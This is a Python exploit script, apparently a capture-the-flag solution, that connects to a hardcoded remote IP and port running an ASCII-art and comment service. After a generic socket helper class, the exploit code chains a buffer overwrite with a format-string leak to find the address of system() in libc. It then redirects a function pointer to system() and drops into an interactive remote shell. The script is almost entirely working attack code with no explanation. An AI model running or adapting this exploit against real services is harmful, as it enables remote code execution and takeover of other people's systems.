#!/usr/bin/env python
#coding: UTF-8

import re
import sys
import time
import struct
import socket
import select

TARGET = ('188.40.18.80', 1234)

#
# Helper Functions
#
def e(s):
    return s.encode('UTF-8')

def d(s):
    return s.decode('UTF-8')

def p(d, fmt='<I'):
    return struct.pack(fmt, d)

def u(d, fmt='<I'):
    return struct.unpack(fmt, d)

def u1(d, fmt='<I'):
    return u(d, fmt)[0]

#
# Networking
#

# The default timeout (in seconds) to use for all operations that may raise an exception
DEFAULT_TIMEOUT = 5

# Custom exceptions raised by the Connection class
class ConnectionError(Exception):
    pass
class TimeoutError(ConnectionError):
    pass

class Connection:
    """Connection abstraction built on top of raw sockets."""

    def __init__(self, remote, local_port=0):
        self._socket = socket.create_connection(remote, DEFAULT_TIMEOUT, ('', local_port))

        # Disable kernel TCP buffering
        self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.disconnect()

    def disconnect(self):
        """Shut down and close the socket."""
        try:
            # This will fail if the remote end reset the connection
            self._socket.shutdown(socket.SHUT_RDWR)
        except:
            pass
        self._socket.close()

    def recv(self, bufsize=4096, timeout=DEFAULT_TIMEOUT, dontraise=False):
        """Receive data from the remote end.

        If dontraise is True recv() will not raise a TimeoutError but instead return an empty string.
        """
        self._socket.settimeout(timeout)
        try:
            data = self._socket.recv(bufsize)
        except socket.timeout:
            if dontraise:
                return b''
            else:
                raise TimeoutError('timed out')

        # recv() returns an empty string if the remote end is closed
        if len(data) == 0:
            raise ConnectionError('remote end closed')

        return data

    def recvln(self, n=1, timeout=DEFAULT_TIMEOUT):
        """Receive lines from the remote end."""
        buf = b''

        while buf.count(b'\n') < n:
            # This maybe isn't great, but it's short and simple...
            buf += self.recv(1, timeout)

        return buf

    def recv_until_found(self, keywords, timeout=DEFAULT_TIMEOUT):
        """Receive incoming data until one of the provided keywords is found."""
        buf = b''

        while not any(True for kw in keywords if kw in buf):
            buf += self.recv(timeout=timeout)

        return buf

    def recv_until_match(self, regex, timeout=DEFAULT_TIMEOUT):
        """Receive incoming data until it matches the given regex."""
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None

        while not match:
            buf += d(self.recv(timeout=timeout))
            match = regex.search(buf)

        return match

    def send(self, data):
        """Send all data to the remote end or raise an exception."""
        self._socket.sendall(data)

    def sendln(self, data):
        """Send all data to the remote end or raise an exception. Appends a \\n."""
        self.send(data + b'\n')

    def interact(self):
        """Interact with the remote end."""
        try:
            while True:
                print(d(self.recv(timeout=.05, dontraise=True)), end='')
                available, _, _ = select.select([sys.stdin], [], [], .05)
                if available:
                    data = sys.stdin.readline()
                    self.send(e(data))
        except KeyboardInterrupt:
            return


def connect(remote):
    """Factory function."""
    return Connection(remote)



#
# Exploit code
#

pause = 0.03

def new_ascii_art(c, content):
    c.sendln(b'1')
    time.sleep(pause)
    c.sendln(b'0')
    time.sleep(pause)
    c.sendln(content)
    time.sleep(pause)

def new_comment(c, num, content):
    c.sendln(b'3')
    time.sleep(pause)
    c.sendln(e(str(num)))
    time.sleep(pause)
    c.sendln(b'1')
    time.sleep(pause)
    c.send(content)
    time.sleep(pause)
    c.sendln(b'0')
    time.sleep(pause)

def delete_all_comments(c, num):
    c.sendln(b'3')
    time.sleep(pause)
    c.sendln(e(str(num)))
    time.sleep(pause)
    c.sendln(b'2')
    time.sleep(pause)
    c.sendln(b'0')
    time.sleep(pause)

def apply_filter(c, num):
    c.sendln(b'3')
    time.sleep(pause)
    c.sendln(e(str(num)))
    time.sleep(pause)
    c.sendln(b'3')
    time.sleep(pause)
    c.sendln(b'0')
    time.sleep(pause)

def quit(c):
    c.sendln(b'0')
    time.sleep(pause)

printf = 0x08048420

off_system = 0x3e2b0
off_start_main = 0x19970 + 9
offset = off_system - off_start_main

with connect(TARGET) as c:
    c.recv()

    print("exploiting 1st time: leaking addr of system...")
    new_ascii_art(c, b'blabla')
    new_comment(c, 1, b'lalalala')
    new_ascii_art(c, b'bash||%38$x')
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x48')
    new_comment(c, 2, p(printf))
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x49')
    c.recv()
    apply_filter(c, 2)

    addr = int(c.recv_until_match("bash\|\|([0-9a-f]+)").group(1), 16)
    addr += offset
    print("system() @ 0x{:x}".format(addr))

    print("exploiting 2nd time: calling into system()...")
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x48')
    new_comment(c, 2, p(addr))
    delete_all_comments(c, 1)
    new_comment(c, 1, 0xfb * b'A' + b'\x49')
    c.recv()
    apply_filter(c, 2)

    c.sendln(b'echo pwned')
    c.recv_until_found([b'pwned'])
    print("pwned!")
    c.interact()
